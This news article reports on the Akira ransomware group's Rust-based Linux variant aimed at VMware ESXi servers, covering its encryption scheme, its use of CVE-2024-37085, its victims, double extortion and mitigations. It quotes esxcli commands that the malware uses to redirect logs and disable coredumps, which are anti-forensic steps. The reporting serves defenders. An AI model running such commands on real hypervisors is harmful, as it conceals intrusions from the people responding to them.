Akira’s New Linux Ransomware Attacking VMware ESXi Servers

The Akira ransomware group, a prominent player in the Ransomware-as-a-Service (RaaS) domain since March 2023, has intensified its operations with a new Linux variant targeting VMware ESXi servers.

Initially focused on Windows systems, Akira expanded its scope in April 2023 by deploying a Linux-based encryptor specifically designed for VMware ESXi servers. 

This pivot reflects a broader trend among ransomware groups targeting virtualized environments due to their centralized role in managing enterprise infrastructure. 

By compromising an ESXi hypervisor, attackers can simultaneously encrypt multiple virtual machines (VMs), amplifying the attack’s impact.

The new Linux variant, part of Akira’s evolving arsenal, represents a strategic shift in their operations. Initially targeting Windows systems with a C++-based encryptor, Akira has now expanded its reach to Linux and VMware ESXi environments. This multi-platform approach demonstrates the group’s adaptability and technical sophistication.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free

Notably, the ransomware appends the .akira extension to encrypted files and supports partial encryption to evade detection while maintaining operational speed.

Akira’s New Linux Ransomware

The Linux version, dubbed Akira v2, is written in Rust, a programming language known for its performance and security features. 

This choice makes the ransomware more challenging to analyze and detect. Akira v2 also appends the “.akiranew” extension to encrypted files and employs a tailored encryption process that targets specific file types.

Of particular concern is Akira v2’s ability to encrypt critical system files, including those with extensions like .edb (Exchange database) and .vhd (virtual hard disk). 

This capability can have devastating consequences for organizations, potentially crippling email services, and virtualized environments

Additionally, Akira’s ransomware employs a sophisticated hybrid encryption scheme, combining ChaCha20 stream cipher with RSA public-key cryptosystem. This approach allows for efficient encryption of large datasets while maintaining secure key exchange.

The Akira ransomware targeting ESXi servers is built with specific functionalities to exploit vulnerabilities in VMware environments. For instance,

• It leverages CVE-2024-37085, an authentication bypass vulnerability in VMware ESXi hypervisors, allowing attackers to gain administrative access via Active Directory misconfigurations.

• The malware includes commands like esxcli system syslog config set –logdir=/tmp to disable logging and esxcli system coredump file set –unconfigure to prevent forensic analysis.

• Unlike some other ransomware targeting ESXi, Akira does not automatically shut down VMs before encryption. However, it provides options for attackers to terminate active VMs manually using commands like stopvm, ensuring maximum disruption.

Victimology and Impact

Bitdefender reports that Akira’s victims span various sectors, including manufacturing, education, finance, and critical infrastructure. The United States remains the most affected country, followed by Canada, the United Kingdom, and Germany. 

Since its inception, the group has claimed over 350 victims globally and extorted approximately $42 million USD as of April 2024.

The ransomware employs a double-extortion strategy: it exfiltrates sensitive data before encrypting files. Victims are pressured to pay high ransoms under the threat of public data leaks on Akira’s Tor-hosted leak site. 

According to the Bitdefender report, The site features a command-line interface where users can access stolen data through commands like leaks and download it via torrent links.

Defensive Measures

Organizations can mitigate the risk of Akira ransomware attacks by adopting robust cybersecurity practices:

• Patch Management: Apply security updates promptly, especially for critical vulnerabilities like CVE-2024-37085.
• Network Segmentation: Isolate critical systems from broader networks to limit lateral movement.
• Endpoint Detection and Response (EDR): Deploy solutions capable of detecting behavioral anomalies associated with ransomware.
• Backup Strategies: Maintain offline or cloud-based backups tested for integrity and recovery speed.
• Multi-Factor Authentication (MFA): Enforce MFA for all remote access points to prevent unauthorized access.

The emergence of Akira’s Linux variant underscores the growing sophistication of ransomware groups targeting virtualized environments like VMware ESXi servers. 

With its ability to exploit vulnerabilities and customize attacks, Akira poses a significant threat to organizations worldwide. 

Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar